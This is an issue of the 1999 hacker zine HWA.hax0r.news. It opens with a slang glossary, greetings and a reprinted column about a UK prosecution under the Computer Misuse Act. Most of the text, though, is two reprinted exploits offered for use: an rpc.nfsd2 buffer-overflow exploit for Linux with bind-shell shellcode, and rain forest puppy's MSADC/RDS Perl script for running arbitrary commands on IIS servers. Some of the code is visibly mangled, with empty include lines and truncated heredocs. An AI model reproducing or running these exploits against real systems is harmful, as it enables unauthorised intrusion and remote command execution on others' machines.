00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for?
never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Steven Levy's HACKERS anymore. BTW to all you up and comers, I'd highly recommend you get that book. It's almost like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA


00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
      2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Steven Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?'
         2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer

*OFCS - Oh for christ's sakes

PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

        Alternates: H - hacking, hacktivist
                    C - Cracking
                    C - Cracking
                    V - Virus
                    W - Warfare
                    A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                    P - Phreaking, "telephone hacking" PHone fREAKs ...
                    CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions from the underground masses. also "w00ten"
        2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck, where the fuck, when the fuck etc ..

*ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-


01.0 Greets!?!?! yeah greets! w0w huh. - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee I'll take any notice mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi

Folks from #hwa.hax0r.news and #fawkerz, #ninjachat and #Hackwhores and #403-sec

Celeb greets to Bad Kitty! meeyeaaooow! (you can hack my root anytime)

Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..." - FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA


01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh?
I'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up...

==============================================================================


02.0 From the editor.
     ~~~~~~~~~~~~~~~~

#include
#include
#include

main()
{
 printf ("Read commented source!\n\n");

 /*
  * This is our Birthday issue! we're ONE as of Nov 13th'99
  *
  * So dig in to our first anniversary issue and enjoy...
  *
  */

 printf ("EoF.\n");
}

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start =-

                              Content start

-= start =--= start =--= start =--= start =--= start =--= start =--= start =-


03.0 Who is Chris Buckley and why was he busted?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The name Chris Buckley is well known in the British H/P newsgroups but he has nothing to do with HP. He's just an internet ng junkie. He posted up to 40 emails a day and took it upon himself to act as BT's "help" guide on one particular newsgroup hurling insults and the like at hapless newbies that were actually looking for tech support and help. BT it seems didn't take too kindly to this action and decided to have his account pulled, in the process of tracking down his account it was discovered that he was indeed using 'borrowed' accounts and an 800 number to access the net that he had no right to be using, hence his downfall and a visit by BT security and the local Police. Durzell picks up on the story .... - Ed

From http://www.barrysworld.com/news/columns.asp?Author=6&Category=6

Contributed by Abattis

When anonymity is no defence

Sunday, November 14, 1999, 03:44

The Internet as it stands today is an almost unimaginable concept. If someone were to come up to me in the street (assuming of course that I'd never heard of the 'Net) and said I could speak to anyone in the World, 'go' anywhere I liked, do pretty much whatever I wanted from the relative sanctity and seclusion of my bedroom, I'd never have believed them. The fact that this supposed unreal concept is an everyday reality to myself and millions of others is a testament to how far technology has taken us in the past few years.

The inherent problem however with the 'Net in its existing incarnation is that for many of us it takes on a form that is quite different from everyday life. Because we are so isolated and protected from this mythical World out there, a fundamental sociological safeguard is missing. Whereas many of us know the divide in everyday life between right and wrong, lawful and unlawful acts - these same principles are often jaded or even non-existent on the Internet.

Out there the perception among the masses is that the likes of warez'ing (i.e. to download commercial material) software is 'the done thing', it's not really stealing, no one gets hurt. Likewise insulting others openly isn't 'real', it's only text after all - it's not the same as RealLifeTM really. However hardened one's resolve is against abusing others, illegally downloading software and other such activities is all too easy to slip into, after all no one can doubt that it's far easier for many people to hide behind a screen and email your thoughts and opinions freely without consequence than it is to attempt to make the same observations in person, especially if they have a controversial nature.

Most of us are fortunate to be able to look upon our Internet existences to date retrospectively, to see where perhaps we made errors of judgements or indeed partook in acts that at the time seemed to be 'part of the 'Net experience', that are in actual fact illegal, costly and damaging to individuals and/or companies whom they affect. For a minority however this luxury is not available to them, people who realised too late the respective 'errors in their ways'.. One such individual is Chris Buckley.

Chris Buckley is somewhat unique in the Internet online community, being someone who is both unknown to a faction of the community, yet synonymous to the rest. His notoriety stems mainly from activities on Usenet (Internet newsgroups) together, more recently, with his usage of several highly publicised BT 0800 staff/engineer numbers. What differentiates Mr Buckley from the thousands of others that had been using these open staff/engineer numbers however is that for reasons best known to themselves, British Telecom are proactively seeking prosecution of this one individual, on charges relating solely to acts he (allegedly) perpetrated on the Internet. These charges are as follows:

1) At (town name) in the county of (county) on 5th July 1999 knowingly caused a computer to perform a function with intent to obtain unauthorised access to the computers running BT Internet.

   Contrary to Section 1 of the Computer Misuse Act 1990

2) At (town name) in the county of (county) on and between 1st and 7th July 1999 sent by means of a public telecommunication system in excess of 100 e-data messages for the purpose of causing annoyance.

   Contrary to Section 42 of the Telecommunications Act 1984

3) At (town name) in the county of (county) on 5th July 1999 made a telephone call for 9 hours 46 minutes and 58 seconds using a public telecommunications system with the intention of avoiding payment for the call.

   Contrary to Section 42 of the Telecommunications Act 1984

As Chris Buckley has rightly stated in correspondence following the announcement of the charges, this is by no means a token case - it is in effect a landmark action by the telecommunications behemoth which, if successful, could lead to charges being brought against hundreds maybe even thousands of other 'Net users that have used this BT 0800 staff/engineer number illegally.

Of course the issue of whether or not the trial is eventually successful is not the focal point of this entire issue, more of the fact that this case marks perhaps the first ever where a UK company has taken on an individual based solely on activities that in many people's eyes would deem to be trivial or circumstantial. After all, who is to say what is classified as 'annoying' e-mail? Can an individual be expected to pay for a freephone (0800) number that allows him/her to connect on a regular ISP account? All these questions will be answered in the trial of Chris Buckley, and I for one will be awaiting the final outcome with trepidation, as it could effectively spell the end of the Internet as many of us know it.

@HWA


04.0 rpc.nfsd2 exploit for Linux
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hack.co.za/

/*
 * rpc.nfsd2 exploit for Linux
 *
 * today is 4/07/99 (3 months after 1st version;)
 *
 * changes in v.2:
 * That version can be used for FULL remote exploiting, I changed/added
 * two important things:
 * - new shellcode: sh on defined port
 * - creating dirs via ftp
 * Now you can hack box remotely if you have +w via ftp.
* (./3nfsd2 -e /home/ftp/incoming -f /incoming) | nc target 21 * * author: tmoggie * greetz: * DiGiT - bug * maxiu - help with shellcode * lam3rZ GrP - :) * */ #include #include #include #include #include #include #define green "\E[32m" #define bold "\E[1m" #define normal "\E[m" #define red "\E[31m" char shell[255] = "\xeb\x70\x31\xc9\x31\xdb\x31\xc0\xb0\x46\xcd\x80\x5e\x83\xc6\x0f\x89\x46" "\x10\x89\x46\x14\x89\x46\x18\xb0\x02\x89\x06\x89\x46\x0c\xb0\x06\x89\x46" "\x08\x31\xc0\xfe\xc3\x89\x5e\x04\xb0\x66\x89\xf1\xcd\x80\x89\x06\xb0\x30" "\x31\xdb\x31\xc9\xb3\x0e\xfe\xc1\xcd\x80\x66\xb8\x69\x7a\x86\xc4\x66\x89" "\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\xb0\x10\x89\x46\x08\xb0\x66\x31" "\xdb\xb3\x02\x89\xf1\xcd\x80\x31\xc0\xfe\xc0\x89\x46\x04\xb0\x66\xb3\x04" "\x89\xf1\xcd\x80\xeb\x04\xeb\x60\xeb\x8c\x89\x46\x0c\x8d\x46\x0c\x89\x46" "\x04\x89\x46\x08\xc6\x46\x0c\x10\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x89\xf1" "\xcd\x80\x83\xee\x0f\x89\xc3\x31\xc9\x89\x4e\x14\xb0\x3f\xcd\x80\x41\xb0" "\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\xfe\x06\xfe\x46\x04\x88\x66\x07\x88\x66" "\x0b\x89\x76\x0c\x8d\x46\x09\x89\x46\x10\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e" "\x0c\x8d\x56\x10\xcd\x80\x31\xdb\x89\xd8\xfe\xc0\xcd\x80\xe8\x9b\xff\xff"; char next[] = "\xff\x2e\x62\x69\x6e\x2e\x73\x68\x41\x41\x2d\x69"; char mark[] = "\xff\xff\xff"; int port = 31337; int offset; void usage(char *prog) { printf("\nusage: %s <-e dir> [-t target] [-s port] " "[-f dir] [-u user] [-p pass]\n\n",prog); printf(" -e dir : real-path to exported direectory\n"); printf(" -t target : target OS\n "); printf(" 1 - RH 5.2 (default) \n" " 2 - Debian 2.1\n"); printf(" -s port : shell port, default is 31337\n"); printf(" -f dir : ftp-path to exported directory\n"); printf(" -u : ftp username (default is ftp)\n"); printf(" -p : ftp password (default is ftp@ftp.org\n\n"); exit(0); } void main(int argc, char **argv) { int i,j; int ftp=0; char user[255]="ftp"; char pass[255]="ftp@ftp.org"; char buf[4096]; char buf2[4096]; char tmp[4096]; 
char tmp2[4096]; char exp[255] = "!"; char exp2[255]= "!"; char addr[] = "\x06\xf6\xff\xff\xbf"; while (1) { i = getopt(argc,argv,"t:e:s:f:u:p:"); if (i == -1) break; switch (i) { case 'e': strcpy(exp,optarg); break; case 's': port = optarg; break; case 'f': strcpy(exp2,optarg); ftp = 1; break; case 'u': strcpy(user,optarg); break; case 'p': strcpy(pass,optarg); break; case 't': switch (j=atoi(optarg)) { case 1: strcpy(addr,"\x06\xf6\xff\xff\xbf"); break; // debian 1.2 case 2: strcpy(addr,"\x18\xf6\xff\xff\xbf"); break; // rh 5.2 } default : usage(argv[0]); break; } } if (!strcmp(exp,"!")) usage(argv[0]); if (ftp == 1) { // sockets, resolve, connect...... } *((unsigned short *) (shell + 66)) = port; offset = strlen(exp); if (exp[offset-1] != '/') strcat(exp,"/"); offset = strlen(exp); // 1st directory bzero(buf,sizeof(buf)); memset(tmp,'A',255); tmp[255]='/'; tmp[256]='\0'; strncpy(buf,exp,offset); // make our dirs if (ftp == 1) { printf("USER %s\n",user); printf("PASS %s\n",pass); printf("CWD %s\n",exp2); } for (i=1;i<=3;i++) { strncat(buf,tmp,strlen(tmp)); if (ftp != 1) { if (mkdir(buf,0777) < 0) { printf(red"...fuck! can't create directory!!! 
: %d\n%s\n"normal,i,buf); exit(-1); } } else { tmp[255]='\0'; printf("MKD %s\n",tmp); printf("CWD %s\n",tmp); } } // offset direcory, length depends on real-path memset(tmp,'A',255); tmp[255-offset]='/'; tmp[256-offset]='\0'; strncat(buf,tmp,strlen(tmp)); if (ftp != 1) { if (mkdir(buf,0777) < 0) { printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal); exit(-1); } } else { tmp[255-offset]='\0'; printf("MKD %s\n",tmp); printf("CWD %s\n",tmp); } // shell directory memset(tmp,'x',255); // printf("%d\n", strlen(shell)); if (ftp == 1) strncat(shell,mark,strlen(mark)); // printf("%d\n", strlen(shell)); strncat(shell,next,strlen(next)); if (ftp == 1) i=3; else i=0; strcpy(tmp+(255+i-strlen(shell)),shell); // printf("%d\n", strlen(shell)); strncat(buf,tmp,strlen(tmp)); strncat(buf,"/",strlen("/")); if (ftp != 1) { if (mkdir(buf,0777) < 0) { printf(red"...fuck!@# shell-dir\n%s\n"normal, buf); exit(-1); } } else { tmp[258]='\0'; printf("MKD %s\n",tmp); printf("CWD %s\n",tmp); } // addr direcotry memset(tmp,'a',255); tmp[97] = '\0'; // *((int*)(tmp+93)) = addr; // if (ftp != 1) *((int*)(tmp+93)) = 0xbffff606; // debian 2.1 // else { strcpy(tmp+93,addr); // } strncat(buf,tmp,strlen(tmp)); if (ftp != 1) { if (mkdir(buf,0777) < 0) { printf(red"...fuck!@#!@#!$ addrez-dir ^\n%s\n"normal, buf); exit(-1); } } else { printf("MKD %s\n",tmp); printf("quit\n",tmp); } fprintf(stderr,normal green"Ok\n"normal); fprintf(stderr,"now you have to do: "bold green \ "rm -rf /path-to-mount-point/A[tab] & \n" "and: telnet target %d\n\n"normal,port); } @HWA 05.0 MSADC/RDS script v2 by rain forest puppy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ #!/usr/bin/perl # # MSADC/RDS 'usage' (aka exploit) script version 2 # # by rain forest puppy # # - added UNC support, really didn't clean up code, but oh well use Socket; use Getopt::Std; getopts("e:vd:h:XRVNwcu:s:", \%args); print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n"; if (!defined $args{h} && !defined $args{R}) 
{ print qq~ Usage: msadc.pl -h { -d -X -v } -h = host you want to scan (ip or domain) -d = delay between calls, default 1 second -X = dump Index Server path table, if available -N = query VbBusObj for NetBIOS name -V = use VbBusObj instead of ActiveDataFactory -v = verbose -e = external dictionary file for step 5 -u <\\\\host\\share\\file> = use UNC file -w = Windows 95 instead of Windows NT -c = v1 compatibility (three step query) -s = run only step Or a -R will resume a (v2) command session ~; exit;} ########################################################### # config data @drives=("c","d","e","f","g","h"); @sysdirs=("winnt","winnt35","winnt351","win","windows"); # we want 'wicca' first, because if step 2 made the DSN, it's ready to go @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner", "banners", "ads", "ADCDemo", "ADCTest"); # this is sparse, because I don't know of many @sysmdbs=( "\\catroot\\icatalog.mdb", "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\certmdb.mdb", "\\system32\\ias\\ias.mdb", "\\system32\\ias\\dnary.mdb", "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", "\\cfusion\\cfapps\\security\\realm_.mdb", "\\cfusion\\cfapps\\security\\data\\realm.mdb", "\\cfusion\\database\\cfexamples.mdb", "\\cfusion\\database\\cfsnippets.mdb", "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", "\\cfusion\\brighttiger\\database\\cleam.mdb", "\\cfusion\\database\\smpolicy.mdb", "\\cfusion\\database\cypress.mdb", "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", "\\website\\cgi-win\\dbsample.mdb", "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", 
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \ ########################################################### $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; if (defined $args{v}) { $verbose=1; } else {$verbose=0;} if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} if(!defined $args{R}){ $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");} if (!defined $args{R}){ $ret = &has_msadc; } if (defined $args{X}) { &hork_idx; exit; } if (defined $args{N}) { &get_name; exit; } if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} if (defined $args{R}) { &load; exit; } print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; if (!defined $args{s} || $args{s}==1){ print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; &try_btcustmr;} if (!defined $args{s} || $args{s}==2){ print "\nStep 2: Trying to make our own DSN..."; if (&make_dsn){ print "<>\n"; sleep(3); } else { print "<>\n"; }} # we need to sleep to let the server catchup if (!defined $args{s} || $args{s}==3){ print "\nStep 3: Trying known DSNs..."; &known_dsn;} if (!defined $args{s} || $args{s}==4){ print "\nStep 4: Trying known .mdbs..."; &known_mdb;} if (!defined $args{s} || $args{s}==5){ if (defined $args{u}){ print "\xStep 5: Trying UNC..."; &use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }} if (!defined $args{s} || $args{s}==6){ if (defined $args{e}){ print "\nStep 6: Trying dictionary of DSN names..."; &dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }} print "\n\nNo luck, guess you'll have to use a real hack, eh?\n"; exit; ############################################################################## sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ open(OUT,">raw.out"); my @in; select(S); $|=1; print $pstr; while(){ print 
OUT $_; push @in, $_; print STDOUT "." if(defined $args{X});} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub make_header { # make the HTTP request my $aa, $bb; if (defined $args{V}){ $aa="VbBusObj.VbBusObjCls.GetRecordset"; $bb="2"; } else { $aa="AdvancedDataFactory.Query"; $bb="3";} $msadc=<Datasource creation successful<\/H2>/;}} } return 0;} ############################################################################## sub verify_exists { my ($page)=@_; my @results=sendraw("GET $page HTTP/1.0\n\n"); return $results[0];} ############################################################################## sub try_btcustmr { foreach $dir (@sysdirs) { print "$dir -> "; # fun status so you can see progress foreach $drive (@drives) { print "$drive: "; # ditto $reqlen=length( make_req(1,$drive,$dir) ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,$drive,$dir)); if (rdo_success(@results)){print "Success!\n"; save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;"); exit;} else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} ############################################################################## sub odbc_error { my (@in)=@_; my $base; my $base = content_start(@in); if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; return $in[$base+4].$in[$base+5].$in[$base+6];} print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n"; print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . $in[$base+4] . $in[$base+5] . 
$in[$base+6]; exit;} ############################################################################## sub verbose { my ($in)=@_; return if !$verbose; print STDOUT "\n$in\n";} ############################################################################## sub save { my ($p1)=@_; my $ropt=""; open(OUT, ">rds.save") || print "Problem saving parameters...\n"; if (defined $args{c}){ $ropt="c ";} if (defined $args{V}){ $ropt.="V ";} if (defined $args{w}){ $ropt.="w ";} print OUT "v2\n$ip\n$ropt\n$p1\n"; close OUT;} ############################################################################## sub load { my ($action)=@_; my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};"; open(IN,"; close(IN); die("Wrong rds.save version") if $p[0] ne "v2\n"; $ip="$p[1]"; $ip=~s/\n//g; $target= inet_aton($ip) || die("inet_aton problems"); print "Resuming to $ip ..."; @switches=split(/ /,$p[2]); foreach $switch (@switches) { $args{$switch}="1";} if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; $torun="$p[3]"; $torun=~s/\n//g; if($torun=~/btcustmr/){ $args{'c'}="1";} # this is a kludge to make it work if($torun=~/^dbq/){ $torun=$drvst.$torun; } if(run_query("$torun")){ print "Success!\n";} else { print "failed\n"; } exit;} ############################################################################## sub create_table { return 1 if (!defined $args{c}); return 1 if (defined $args{V}); my ($in)=@_; $reqlen=length( make_req(2,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . 
make_req(2,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table 'AZZ' already exists/; return 0;} ############################################################################## sub known_dsn { foreach $dSn (@dsns) { print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";} ############################################################################## sub is_access { my ($in)=@_; return 1 if (!defined $args{c}); return 1 if (defined $args{V}); $reqlen=length( make_req(5,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; my $req; if (defined $args{c}){$req=3;} else {$req=6;} $reqlen=length( make_req($req,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req($req,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=("c","d","e","f","g"); my @dirs=("winnt","winnt35","winnt351","win","windows"); my $dir, $drive, $mdb; my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; foreach $drive (@drives) { foreach $dir (@sysdirs){ foreach $mdb (@sysmdbs) { print "."; if(create_table($drv.$drive.":\\".$dir.$mdb)){ if(run_query($drv . $drive . ":\\" . $dir . 
$mdb)){ print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit; }}}}} foreach $drive (@drives) { foreach $mdb (@mdbs) { print "."; if(create_table($drv.$drive.":".$mdb)){ if(run_query($drv.$drive.":".$mdb)){ print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit; }}}} } ############################################################################## sub hork_idx { print "\nAttempting to dump Index Server tables...\n"; print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/\x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{"$1$2"}="";} foreach $c (keys %d){ print "$c\n"; } } else {print "Index server not installed/query failed\n"; }} ############################################################################## sub dsn_dict { open(IN, "<$args{e}") || die("Can't open external dictionary\n"); while(){ $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n"; close(IN);} ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { # assume there's less than 500 headers if($in[$c] =~/^\x0d\x0a/){ if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } else { return $c+1; }}} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ 
print "\nServer returned an ADO miscofiguration message\nAborting.\n"; exit;} if($error=~/A Handler is required/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;} if($error=~/specified Handler has denied Access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;} if($error=~/server has denied access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;}} ############################################################################## sub has_msadc { my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n"); my $base=content_start(@results); return if($results[$base]=~/Content-Type: application\/x-varg/); my @s=grep("^Server:",@results); if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" } else { print "/msadc/msadcs.dll was not found.\n";} exit;} ############################################################################## sub use_unc { $uncpath=$args{u}; $driverline="driver={Microsoft Access Driver (*.mdb)};dbq="; if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){ print "Your UNC path sucks. You need the following format:\n". "\\server(ip preferable)\share\some-file.mdb\n\n"; exit; } if(create_table($driverline.$uncpath)){ if(run_query($driverline.$uncpath)){ print "Success!\n"; save ("dbq=".$uncpath); exit;}} } ############################################################################## sub get_name { # this was added last minute my $msadc=<.,?]//g; print "Machine name: $results[$base+6]\n";} ############################################################################## # special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm, # #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and # good friends!), wiretrip, l0pht, nmrc & all of phrack # # thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice # # I wish I could really name everyone, but I can't. Don't feel slighted if # your not on the list... 
